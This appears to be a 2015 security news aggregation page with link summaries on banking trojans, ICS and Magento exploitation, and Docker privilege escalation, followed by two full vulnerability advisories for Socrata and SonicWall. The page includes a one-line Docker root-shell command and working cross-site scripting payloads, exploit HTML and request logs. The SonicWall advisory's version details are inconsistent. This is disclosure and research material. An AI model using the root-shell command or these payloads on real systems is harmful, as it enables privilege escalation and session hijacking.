
Report: Chasing the cybercrime: network insights of Dyre and Dridex Trojan bankers.

Trojan Bankers are a family of botnets that specialize in stealing information related to the financial sector and user data in order to sell it in underground marketplaces; some of them also perform wire transfers using these credentials or by taking control of the infected computer.

Due to the difficulties posed by the different security firms, or by the competition that exists between different products, which nourishes it, the malware industry is always evolving and improving its products.

In the current landscape of Banking Trojans, Dyre and Dridex are the most nefarious ones due to the amount of infections that they have racked up since they were discovered, and to the mechanisms that make them more resilient.

At Blueliv, we launched an intensive investigation to find out how these botnets operate. We were able to analyze the networking protocol for both Dyre and Dridex and to infiltrate the botnet, gathering a lot of information about how they operate and whom they target.

more here.......https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf

Hacking industrial control systems – Case study: Falcon

Exploiting the Honeywell Falcon

This post picks up where the earlier posts, CVE-2014-2717: Attacking the Honeywell Falcon XLWeb (30.09.2014) and Cross Site Scripting – Attacking the Honeywell Falcon XLWeb part two (02.10.2014), left off.

In the following blog post we will move from gaining application-level administrative control, to using XSS to target system administrators, and finally to gaining a shell at the operating-system level of the equipment using a combination of misconfigurations and security issues.

more here........https://www.outpost24.com/hacking-industrial-control-systems-case-study-falcon/

MS15-035 EMF file handling vulnerability analysis and POC structure

AppCompatCache changes in Windows 10

Privilege Escalation via Docker

TLDR; Don’t use the ‘docker’ group

Docker, if you aren’t already familiar with it, is a lightweight runtime and packaging tool. It’s very similar to simply running a basic virtual machine, but with much less overhead. It’s extremely nice for deploying applications as you can guarantee that they will run in identical environments, and the commit-like image system is handy as well.

If you happen to have gotten access to a user-account on a machine, and that user is a member of the ‘docker’ group, running the following command will give you a root shell:

> docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

more here.......https://fosterelli.co/privilege-escalation-via-docker.html
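As an added example (not code from the fosterelli.co post), here is a small audit that lists every account on a host that effectively holds the 'docker' group, and therefore the root-equivalent access described above. The sample /etc/group and /etc/passwd contents are constructed, and the function names are assumptions of this example.

```python
"""Audit which accounts can reach the Docker daemon through the 'docker' group.

Added example, not from the post above. Membership can come from two places,
and both are checked:
  * the supplementary member list on the 'docker' line of /etc/group, and
  * any account whose primary GID in /etc/passwd equals the docker group's GID
    (created e.g. with `useradd -g docker ...`, invisible in /etc/group).
"""

GROUP_NAME = "docker"

# Constructed sample files (not taken from a real host).
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:alice
docker:x:999:alice,bob
users:x:100:
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
ci:x:1002:999:ci runner:/var/lib/ci:/bin/sh
"""


def parse_group(text):
    """Return {group_name: (gid, [supplementary members])} from /etc/group text."""
    groups = {}
    for line in text.splitlines():
        fields = line.split(":")
        if not line or line.startswith("#") or len(fields) < 4:
            continue
        name, gid, members = fields[0], int(fields[2]), fields[3]
        groups[name] = (gid, [m for m in members.split(",") if m])
    return groups


def parse_passwd(text):
    """Return {user_name: primary_gid} from /etc/passwd text."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if not line or line.startswith("#") or len(fields) < 4:
            continue
        users[fields[0]] = int(fields[3])
    return users


def docker_group_members(group_text, passwd_text, group_name=GROUP_NAME):
    """Sorted list of accounts that are effectively in the docker group.

    Every account listed here can start a container that bind-mounts / and
    runs as root inside it, which is the root-equivalent access the post
    describes; treat each one as a sudoer without a password prompt or log.
    """
    groups = parse_group(group_text)
    if group_name not in groups:
        return []
    gid, supplementary = groups[group_name]
    primary = [user for user, g in parse_passwd(passwd_text).items() if g == gid]
    return sorted(set(supplementary) | set(primary))


def audit_live(group_path="/etc/group", passwd_path="/etc/passwd"):
    """Run the audit against the real files of the current host."""
    with open(group_path) as g, open(passwd_path) as p:
        return docker_group_members(g.read(), p.read())


if __name__ == "__main__":
    for account in docker_group_members(SAMPLE_GROUP, SAMPLE_PASSWD):
        print(f"root-equivalent via docker group: {account}")
```

Call `audit_live()` to check a real host. Note the `ci` service account in the sample: it never appears on the docker line of /etc/group, so an audit that reads only that file misses it. The remediation is the one the post gives: do not hand out the group, route the few people who need the daemon through `sudo docker` so the calls are logged, or run the daemon in rootless mode.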

Analyzing the Magento Vulnerability

Check Point researchers recently discovered a critical RCE (remote code execution) vulnerability in the Magento web e-commerce platform that can lead to the complete compromise of any Magento-based store, including credit card information as well as other financial and personal data, affecting nearly two hundred thousand online shops.

more here...............http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/

Creating Burp extensions in Python, the "editor" case

Surely you've heard of the Burp Suite, quite useful software to perform security testing of web applications and in general to play with anything that talks HTTP(S). There's even a free edition which is often more than enough since I mostly use just Proxy and Repeater.

You can even write extensions to automate things or support some weird things you might see on top of HTTP. Burp being written in Java, you can write your extensions in Java. They also allow you to write them in Python or Ruby, using Jython or JRuby.

I needed to write an extension recently, in Python since I don't particularly like Java. This post shares my experience and resulting code........http://blog.stalkr.net/2015/04/creating-burp-extensions-in-python.html

Implementing Secure User Authentication in PHP Applications with Long-Term Persistence

A common problem in web development is to implement user authentication and access controls, typically accomplished through sign-up and log-in forms. Though these systems are simple enough in theory, engineering one that lives up to application security standards is a daunting undertaking.

Without a great deal of care and sophistication, authentication systems can be as fragile as a cardboard lemonade stand in a category five hurricane. However, for everything that can go wrong, there is an effective (and often simple) way to achieve a higher level of security and resilience.

more here.........https://paragonie.com/blog/2015/04/secure-authentication-php-with-long-term-persistence

Socrata Bug Bounty #1 - Persistent Encoding Vulnerability

Document Title:
===============
Socrata Bug Bounty #1 - Persistent Encoding Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1438


Release Date:
=============
2015-04-22


Vulnerability Laboratory ID (VL-ID):
====================================
1438


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
Private Socrata Bug Bounty Program - BC


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation vulnerability in the Socrata online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-02-24: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2015-02-24: Vendor Notification (Socrata Security Team - Silent Bug Bounty Program)
2015-02-24: Vendor Response/Feedback (Socrata Security Team - Silent Bug Bounty Program)
2015-02-24: Vendor Fix/Patch (Socrata Developer Team)
2015-02-25: Bug Bounty Reward (Socrata Security Team - Silent Bug Bounty Program)
2015-04-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Socrata Inc
Product: Socrata Online Service - Web Application 2015 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side mail encoding web vulnerability has been discovered in the official Socrata online service web-application.
The vulnerability allows remote attackers to bypass the outgoing mail filter validation of the Socrata web-server and web-application.

The vulnerability is located in the firstname and lastname values of the `leadCapture/save` module. Remote attackers without a privileged
application user account are able to inject persistent malicious script code. The script code executes in the notification mail to the service
and also in the copy mail sent to the active user. The injected script code executes in the header section where the database-stored first and
last name are displayed. The sender interacts automatically through the discover.socrata.com service. The database-stored outgoing values are
encoded incorrectly, which allows persistent injection of malicious script code via the POST method. The attack vector is persistent and the
request method used to inject is POST.

The security risk of the mail encoding web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.3.
Exploitation of the web vulnerability requires no privileged web-application user account and low or medium user interaction because of the
persistent attack vector. Successful exploitation of the encoding vulnerability results in session hijacking, persistent phishing, persistent
external redirects and persistent manipulation of web header or mail body context.

Vulnerable Domain(s):
                                [+] discover.socrata.com

Vulnerable Module(s):
                                [+] index.php/leadCapture/save

Vulnerable Parameter(s):
                                [+] firstname
                                [+] lastname

Affected Sender(s):
                                [+] sales@socrata.com

Affected Receiver(s):
                                [+] bkm@evolution-sec.com

Affected Context Module(s):
                                [+] Service Notification Mail (Users)


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.

Manual steps to reproduce the vulnerability ...
1. Surf to the vulnerable service page
2. Inject the payload into the firstname and lastname values
3. Save the content
4. View your mailbox to review the malicious mail
5. The security vulnerability has been reproduced successfully!


PoC: Thank You for Downloading "The 2014 Benchmark Report"

<tbody><tr><td valign="top"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody>
<tr><td style="font-family:Helvecita, Arial,sans-serif; font-size:26px; line-height:30px; color:#2f2b26;
padding:35px 20px 35px 20px; " align="center" valign="top"><div id="TopHeadline" class="mktEditable">2014 Open Data Benchmark Report</div>
</td>
</tr>
<tr><td colspan="2" align="left" valign="top"><div class="headerDefault"><div id="Header" class="mktEditable"></div>
</div>
</td>
</tr>
</tbody></table>
</td>
</tr>
<tr><td style="padding:25px 25px 50px 25px; "><table class="column1" style="background:#fff; " align="left" border="0" cellpadding="0"
cellspacing="0"><tbody><tr><td style="font-family:Helvetica,Arial,sans-serif; color:#928e8b; font-size:16px; line-height:20px;
padding-bottom:25px; " valign="top"><div id="SubHeadline" class="mktEditable">Read the Full Report</div>
</td>
</tr>
<tr><td style="font-family:Helvetica,Arial,sans-serif; color:#555555; font-size:12px; line-height:17px; " valign="top"><div id="Body"
class="mktEditable"><p style="margin-top: 0;">Hello ">[PERSISTENT INJECTED SCRIPT CODE HERE!]<iframe src="http://www.evolution-sec.com/peng.js" onload="alert(document.cookie),</p">
<p><span><p>Thank you for your interest in Socrata. You can download the 2014 Open Data Benchmark Study at any time by clicking the Download Now button below.</p>
<p>An effective digital portal is the foundation of improving efficiency with open data. Learn how the <a href=
"http://info.socrata.com/P000y0zS9I1GB80m0SpI193" target="_blank"
>Socrata Open Data Portal</a> can help you streamline data publishing as well as enable others to search, query, and visualize your data with ease.</p></span></p>
<p>Sincerely,<br />   The Socrata Team </p></div>
<table border="0" cellspacing="0" cellpadding="0" width="130" ><tr ><td valign="top" style="line-height:38px;">
<img src="http://discover.socrata.com/rs/socrata/images/SOC-2001-EmailTemplate_button-bg-left.png" width="4" height="38" style="display:block;"></td>
<td valign="middle" align="center" width="122" style="background:#3688c7; font-family:Arial,sans-serif; font-size:11px; " id="cta" >
<div class="mktEditable" id="ctabutton" ><a style="color: #fff; text-decoration: none;" href="http://info.socrata.com/dc/etTJjiR4FWljikJd-Q32ft94T9WmU3brfUe91EtPV5Ni0xg-
fugbOrtKryWragOmEUOmuznx6oKiB7-ZI_vvTlWvpJxF-ZMxGVvTpDTBBgewMyZQls7ugS6M1FrTI_N_/DSz801n0IIS00m019y3G0z9
">Download Now</a></div>
</td>
<td valign="top" style="line-height:38px;"><img src="http://discover.socrata.com/rs/socrata/images/SOC-2001-EmailTemplate_button-bg-right.png" width="4" height="38" style="display:block;"></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>


--- PoC Session Logs [POST] (Injection) ---
18:22:52.246[607ms][total 607ms] Status: 200[OK]
POST http://discover.socrata.com/index.php/leadCapture/save2 Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[162] Mime Type[application/json]
Request Header:
Host[discover.socrata.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://discover.socrata.com/2014-open-data-benchmark-report.html?utm_source=website&utm_medium=organic&utm_content=benchmark-ctas&utm_campaign=2014-benchmark-report]
Content-Length[1547]
Cookie[_ga=GA1.2.1116345037.1424797254; _mkto_trk=id:851-SII-641&token:_mch-socrata.com-1424797253790-11625; BIGipServerabkweb_app_http=805830922.20480.0000; _ga=GA1.3.1116345037.1424797254; __ar_v4=VEJ5FE467RDKVEKTJM4OBA%3A20150226%3A4%7CYVZAENVZKNFATNFDNV7HDD%3A20150226%3A6%7CBASXJGCN7FCI5NFI65M4R7%3A20150226%3A6%7CZV6R5RYQUZFC7NTFHALGCQ%3A20150226%3A2; _bizo_bzid=2dccc537-d055-4ced-8648-cc5eff5e5db6; _bizo_cksm=2A2F66AADC1BB497; _bizo_np_stats=14%3D75%2C; __csess=1424799445047.9ZTM9L.; _gat_UA-9046230-4=1; __cdrop=.7YI4DD.]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
FirstName[%22%3E%3Ciframe%20src%3Da%20onload%3Dalert(%22PENTEST%22)]
LastName[%22%3E%3Ciframe%20src%3Da%20onload%3Dalert(%22PENTEST%22)%20%3C]
Email[bkm%40evolution-sec.com]
Company[sap%20epi]
Title[pentester%2023%20ONE]
testtest__c[]
Opt_in_Checkbox__c[Yes]
UTM_Term__c[]
UTM_Source__c[website]
UTM_Medium__c[organic]
UTM_Content__c[benchmark-ctas]
UTM_Campaign__c[2014-benchmark-report]
RF_HQ_Company_Name__c[]
RF_MS_Address1__c[]
RF_MS_Address2__c[]
RF_MS_Annual_Revenue__c[]
RF_MS_City__c[]
RF_MS_Company_Name__c[]
RF_MS_Confidence_Level__c[not%20found]
RF_MS_Employee_Location_Count__c[]
RF_MS_Employee_Total_Count__c[]
RF_MS_Inferred_Area_Code__c[]
RF_MS_Inferred_City__c[Heidelberg]
RF_MS_Inferred_Country__c[Germany]
RF_MS_Inferred_State__c[Baden-Wurttemberg]
RF_MS_Location_Type__c[]
RF_MS_NAICS_Name__c[]
RF_MS_NAIC_Code__c[]
RF_MS_Phone__c[]
RF_MS_SIC__c[]
RF_MS_SIC_Code__c[]
RF_MS_SIC_Name__c[]
RF_MS_State_Code__c[]
RF_MS_State_Name__c[]
RF_MS_Subsidiary_Code__c[]
RF_MS_Trade_Name__c[]
RF_MS_URL__c[]
RF_MS_postal_Code__c[]
Qualification_PM_Highest_Priorities__c[Public%20Safety]
formid[1968]
lpId[4775]
subId[147]
munchkinId[851-SII-641]
lpurl[http%3A%2F%2Fdiscover.socrata.com%2F2014-Open-Data-Benchmark-Report_Landing-Page-B.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D]
cr[]
kw[]
q[]
_mkt_trk[id%3A851-SII-641%26token%3A_mch-socrata.com-1424797253790-11625]
formVid[1968]
_mktoReferrer[http%3A%2F%2Fdiscover.socrata.com%2F2014-open-data-benchmark-report.html%3Futm_source%3Dwebsite%26utm_medium%3Dorganic%26utm_content%3Dbenchmark-ctas%26utm_campaign%3D2014-benchmark-report]
Response Header:
Server[nginx]
Date[Tue, 24 Feb 2015 17:22:57 GMT]
Content-Type[application/json; charset=utf-8]
Content-Length[162]
Connection[keep-alive]
Access-Control-Allow-Origin[*]
Vary[Accept-Encoding]
Content-Encoding[gzip]
-
18:22:52.871[1070ms][total 1332ms] Status: 200[OK]
GET http://discover.socrata.com/2014-benchmark-report-email-thank-you.html?aliId=5515772 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[6524] Mime Type[text/html]
Request Header:
Host[discover.socrata.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://discover.socrata.com/2014-open-data-benchmark-report.html?utm_source=website&utm_medium=organic&utm_content=benchmark-ctas&utm_campaign=2014-benchmark-report]
Cookie[_ga=GA1.2.1116345037.1424797254; _mkto_trk=id:851-SII-641&token:_mch-socrata.com-1424797253790-11625; BIGipServerabkweb_app_http=805830922.20480.0000; _ga=GA1.3.1116345037.1424797254; __ar_v4=VEJ5FE467RDKVEKTJM4OBA%3A20150226%3A4%7CYVZAENVZKNFATNFDNV7HDD%3A20150226%3A6%7CBASXJGCN7FCI5NFI65M4R7%3A20150226%3A6%7CZV6R5RYQUZFC7NTFHALGCQ%3A20150226%3A2; _bizo_bzid=2dccc537-d055-4ced-8648-cc5eff5e5db6; _bizo_cksm=2A2F66AADC1BB497; _bizo_np_stats=14%3D75%2C; __csess=1424799445047.9ZTM9L.; _gat_UA-9046230-4=1; __cdrop=.7YI4DD.]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Tue, 24 Feb 2015 17:22:58 GMT]
Content-Type[text/html; charset=utf-8]
Content-Length[6524]
Connection[keep-alive]
p3p[CP="CAO CURa ADMa DEVa TAIa OUR IND UNI COM NAV INT"]
Vary[*,Accept-Encoding]
Content-Encoding[gzip]

Reference(s):
http://discover.socrata.com/index.php/leadCapture/save2
http://discover.socrata.com/2014-benchmark-report-email-thank-you.html?aliId=5515772
http://discover.socrata.com/2014-open-data-benchmark-report.html?utm_source=website&utm_medium=organic&utm_content=benchmark-ctas&utm_campaign=2014-benchmark-report


Solution - Fix & Patch:
=======================
Encode and parse the firstname and lastname values in the contact form. Restrict the input to disallow injection of special characters or script code.
Parse the outgoing contact mails that contain user values to prevent persistent script code execution in the mail body.


Security Risk:
==============
The security risk of the application-side mail encoding web vulnerability is estimated as medium. (CVSS 3.3)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

SonicWall SonicOS 7.5.0.12 & 6.x - Cross Site Vulnerability

Document Title:
===============
SonicWall SonicOS 7.5.0.12 & 6.x - Cross Site Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1359


Release Date:
=============
2015-04-23


Vulnerability Laboratory ID (VL-ID):
====================================
1359


Common Vulnerability Scoring System:
====================================
3


Product & Service Introduction:
===============================
The proven SonicOS architecture is at the core of every Dell™ SonicWALL™ firewall from the SuperMassive™ E10800 to the TZ 100.
SonicOS uses deep packet inspection technology in combination with multi-core specialized security microprocessors to deliver
application intelligence, control, and real-time visualization, intrusion prevention, high-speed virtual private networking (VPN)
technology and other robust security features.

(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Network-Security-Platform.html )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a cross site vulnerability in the official SonicWall SonicOS v6.x and v7.5.0.12.


Vulnerability Disclosure Timeline:
==================================
2015-04-23: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
DELL
Product: Sonicwall SonicOS 7.5.0.12 & v6.x


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple client-side cross site scripting web vulnerabilities have been discovered in the official SonicWall SonicOS v6.x and v7.5.0.12.
The security vulnerability allows remote attackers to manipulate client-side application-to-browser requests in order to compromise session information.

The vulnerability is located in the `searchSpoof` and `searchSpoofIpDet` values of the `Network > MAC-IP Anti-spoof` module. Remote attackers are able to
inject malicious script code into client-side application requests. Remote attackers are able to prepare specially crafted web links that execute client-side
script code which compromises the SonicOS application user/admin session data. The execution of the script code occurs in the MAC-IP anti-spoof module.
The attack vector of the vulnerability is located on the client side of the online service and the request method used to inject or execute the code is GET.

The security risk of the non-persistent cross site vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.0.
Exploitation of the non-persistent cross site scripting web vulnerability requires no privileged web application user account and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent loading
of malicious script code or non-persistent web module context manipulation.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Network > MAC-IP Anti-spoof

Vulnerable File(s):
[+] macIpSpoofView.html

Vulnerable Parameter(s):
[+] searchSpoof
[+] searchSpoofIpDet


During the client security tests the research team noticed that the official VM version and all appliance models are affected by the security issue.
The following versions and models of the SonicWall appliance web-application are affected by the remote cross site scripting vulnerability.

Affected Model(s):
[+] (CASS) Anti Spam - UTM Integrated Anti-Spam
[+] (CASS) Anti Spam - Enhanced Comprehensive Anti-spam
[+] (CASS) Anti Spam - Email Security

Affected Version(s):
[+] SonicOS v7.5.0.12
[+] SonicOS v6.x


Proof of Concept (PoC):
=======================
The client-side cross site scripting vulnerability can be exploited by remote attackers without a privileged application user account and
with low or medium user interaction. For security demonstration or to reproduce the security vulnerability, follow the provided information
and steps below.


PoC: Payload(s)
https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Ciframe%20src=http://www.vulnerability-lab.com onload=alert("PENTEST")%20<&searchSpoofIpDet=[x]

https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=[x]
&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20


PoC: Exploit

<html>
<head><body>
<title>Sonicwall AntiSpam "SonicOS Enhanced 5.9.0.7" - (searchSpoof & searchSpoofIpDet) Cross Site Scripting PoC</title>
<iframe src=https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Ciframe src=http://www.vulnerability-lab.com onload=alert("PENTEST")%20<&searchSpoofIpDet=[x]>
<br>
<img src=https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=[x]
&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20>
<br>
<iframe src=https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Cimg src=http://www.vulnerability-lab.com/files/ptest.png onload=alert(document.cookie)%20<&searchSpoofIpDet=%22%3E%3Cimg
src=http://www.vulnerability-lab.com/files/ptest.png onload=alert(document.cookie)%20<
</body></head>
</html>

Note: Exploiting a Cross Site Scripting Vulnerability in the searchSpoof value of the macIpSpoofView.html file.



PoC: Vulnerable Source

<td class="listLabel" align="left" nowrap="" width="15%">
<span class="objItemSpacing">
<input title="" name="capCbox" onclick="checkAllSpoofIp(this);" onfocus="if (this.disabled) { this.blur(); }" type="checkbox">
</span>
<span class="listLabel" align="left" nowrap="">
<script type="text/JavaScript">
<!--
setSpoofIpColHead(1, 'IP Address');
// -->
</script><a class="tableLink" href="/macIpSpoofView.html?tableSortCol=1&tableSortInverted=0&
searchSpoof="><[CLIENT-SIDE SCRIPT CODE EXECUTION!];)" &searchspoofipdet="&startItem=0&startItemIpDet=0"">IP Address</a>
</span>
</td>
<td class="listLabel" align="left" width="10%" nowrap>
<script type="text/JavaScript">
<!--
setSpoofIpColHead(2, 'Type');
// -->
</script>
</td>
<td class="listLabel" align="left" width="10%" nowrap>
<script type="text/JavaScript">
<!--
setSpoofIpColHead(3, 'Interface');
// -->
</script>
</td>
<td class="listLabel" align="left" width="15%" nowrap>
<script type="text/JavaScript">
<!--
setSpoofIpColHead(4, 'MAC Address');
// -->
</script>
</td>
<td class="listLabel" align="left" width="20%" nowrap>
<script type="text/JavaScript">
<!--
setSpoofIpColHead(5, 'Host Name');
// -->
</script>



--- PoC Session Logs [GET] ---
Status: 200[OK]

GET https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3C[CLIENT-SIDE SCRIPT CODE INJECTION!]&searchSpoofIpDet= Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[cas.127.0.0.1:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://cas.127.0.0.1:8080/macIpSpoofView.html]
Cookie[__utma=227649090.564465250.1416863624.1416863624.1416865480.2; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA; s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink; s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D; sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1]
Connection[keep-alive]
Response Header:
Server[SonicWALL]
Expires[-1]
Cache-Control[no-cache]
Content-Type[text/html; charset=UTF-8;]



-
Status: 200[OK]

GET https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[cass240.demo.sonicwall.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://cass240.demo.sonicwall.com/macIpSpoofView.html]
